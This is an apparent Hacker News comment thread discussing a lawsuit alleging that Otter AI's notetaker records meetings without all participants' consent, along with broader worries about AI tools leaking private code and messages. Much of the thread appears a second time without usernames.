Before AI, you needed to trust the recipient and the provider (Gmail, Signal, WhatsApp, discord). You could at least make educated guesses about both for the risk profile. Such as: if someone leaks the code to this repo, it’s likely a collaborator or GitHub.
Today, you invite someone to a private repo and the code gets exfiltrated by a collaborator running whatever AI tool simply by opening their IDE.
Or you send someone an e2ee message on Signal but their AI reads the screen/text to summarize and now that message is exfiltrated.
Yes, I know it’s ”nothing new” ”in principle this could happen because you don’t control the client”. But opsec is also about what happens when well-meaning participants being accomplices in data collection. I used to trust that my friends enough to not share our conversations. Now the default assumption is that text & media on even private messaging will be harvested.
Personally I’m not ever giving keys to the kingdom to a remote data-hungry company, no matter how reputable. I’ll reconsider when local or self-hosted AI is available.
bilekas · 8m ago
> Last year, an AI researcher and engineer said Otter had recorded a Zoom meeting with investors, then shared with him a transcription of the chat including "intimate, confidential details" about a business discussed after he had left the meeting. Those portions of the conversation ended up killing a deal,
I'm sorry but this is another example of not checking AI's work. Whatever about the excessive recording, that's one thing, but blindly trusting the AI's output and then using it blindly as a company document for a client is on you.
DaiPlusPlus · 1h ago
Assuming the courts simplify Otter AI down to being a glorified call recording and transcribing tool (because the fact it's "AI" isn't really relevant here w.r.t. privacy/one/two-party-consent rules then doesn't the legal responsibility here lie with whichever person added Otter AI to group-calls without informing the other members?
----
EDIT: So the crux of the matter is whether-or-not having Otter AI automatically join meetings via their Slack/Zoom/etc integrations is by-itself legally wrong - or not:
> "In fact, if the meeting host is an Otter accountholder who has integrated their relevant Google Meet, Zoom, or Microsoft Teams accounts with Otter, an Otter Notetaker may join the meeting without obtaining the affirmative consent from any meeting participant, including the host," the lawsuit alleges. "What Otter has done is use its Otter Notetaker meeting assistant to record, transcribe, and utilize the contents of conversations without the Class members' informed consent."
I'm surprised the NPR article doesn't touch on the possible liability of whoever added Otter in the first place - surely the buck stops there?
gruez · 1h ago
>doesn't the legal responsibility here lie with whichever person added Otter AI to group-calls without informing the other members
IANAL but companies providing a product has certain responsibilities too, especially when they're intended to be used for a given purpose (ie. recording meetings with other people on it). Most call recording software I come across have a recording notice that can't be disabled, presumably to avoid lawsuits like this.
>EDIT: So the crux of the matter is whether-or-not having Otter AI automatically join meetings via their Slack/Zoom/etc integrations is by-itself legally wrong - or not:
Note the preceding paragraph also notes that even when the integrations aren't used, otter only obtains consent from the meeting host. In all-party consent states that's clearly not sufficient.
>because the fact it's "AI" isn't really relevant here
Again, IANAL, but "recording" laws might not apply if they're merely transcribing the audio? To take an extreme case, it's (probably) legal to hire a stenographer to sit next to you on meetings and transcribe everything on the call, even if you don't tell any other participants. Otter is a note-taking app, so they might have been in the clear if they weren't recording for AI training.
boothby · 1h ago
I had a conversation with a lawyer who had invited OtterAI to our confidential meeting. I was gobsmacked, and I quickly read Otter's privacy statement -- my impression was that they retain your data in a cloud service and use your "anonymized" (or was it "depersonalized"?) recordings as future training data. Even if they have a bona fide reason for all that, I question their ability to store the data securely and succeed in anonymizing data that contains unique identifiers that could be tied to future court records. I refused to continue in the presence of the bot.
And, even beyond security is their ability to hold promises made over the data in the event of a private equity takeover, a rogue employee, etc.
xnx · 1h ago
Why does Otter AI exist? Aren't those features built-in to videoconferencing now?
jorts · 59m ago
Most of the ones built into the video conferencing solutions aren't as good.
Today, you invite someone to a private repo and the code gets exfiltrated by a collaborator running whatever AI tool simply by opening their IDE.
Or you send someone an e2ee message on Signal but their AI reads the screen/text to summarize and now that message is exfiltrated.
Yes, I know it’s ”nothing new” ”in principle this could happen because you don’t control the client”. But opsec is also about what happens when well-meaning participants being accomplices in data collection. I used to trust that my friends enough to not share our conversations. Now the default assumption is that text & media on even private messaging will be harvested.
Personally I’m not ever giving keys to the kingdom to a remote data-hungry company, no matter how reputable. I’ll reconsider when local or self-hosted AI is available.
I'm sorry but this is another example of not checking AI's work. Whatever about the excessive recording, that's one thing, but blindly trusting the AI's output and then using it blindly as a company document for a client is on you.
----
EDIT: So the crux of the matter is whether-or-not having Otter AI automatically join meetings via their Slack/Zoom/etc integrations is by-itself legally wrong - or not:
> "In fact, if the meeting host is an Otter accountholder who has integrated their relevant Google Meet, Zoom, or Microsoft Teams accounts with Otter, an Otter Notetaker may join the meeting without obtaining the affirmative consent from any meeting participant, including the host," the lawsuit alleges. "What Otter has done is use its Otter Notetaker meeting assistant to record, transcribe, and utilize the contents of conversations without the Class members' informed consent."
I'm surprised the NPR article doesn't touch on the possible liability of whoever added Otter in the first place - surely the buck stops there?
IANAL but companies providing a product has certain responsibilities too, especially when they're intended to be used for a given purpose (ie. recording meetings with other people on it). Most call recording software I come across have a recording notice that can't be disabled, presumably to avoid lawsuits like this.
>EDIT: So the crux of the matter is whether-or-not having Otter AI automatically join meetings via their Slack/Zoom/etc integrations is by-itself legally wrong - or not:
Note the preceding paragraph also notes that even when the integrations aren't used, otter only obtains consent from the meeting host. In all-party consent states that's clearly not sufficient.
>because the fact it's "AI" isn't really relevant here
Again, IANAL, but "recording" laws might not apply if they're merely transcribing the audio? To take an extreme case, it's (probably) legal to hire a stenographer to sit next to you on meetings and transcribe everything on the call, even if you don't tell any other participants. Otter is a note-taking app, so they might have been in the clear if they weren't recording for AI training.
And, even beyond security is their ability to hold promises made over the data in the event of a private equity takeover, a rogue employee, etc.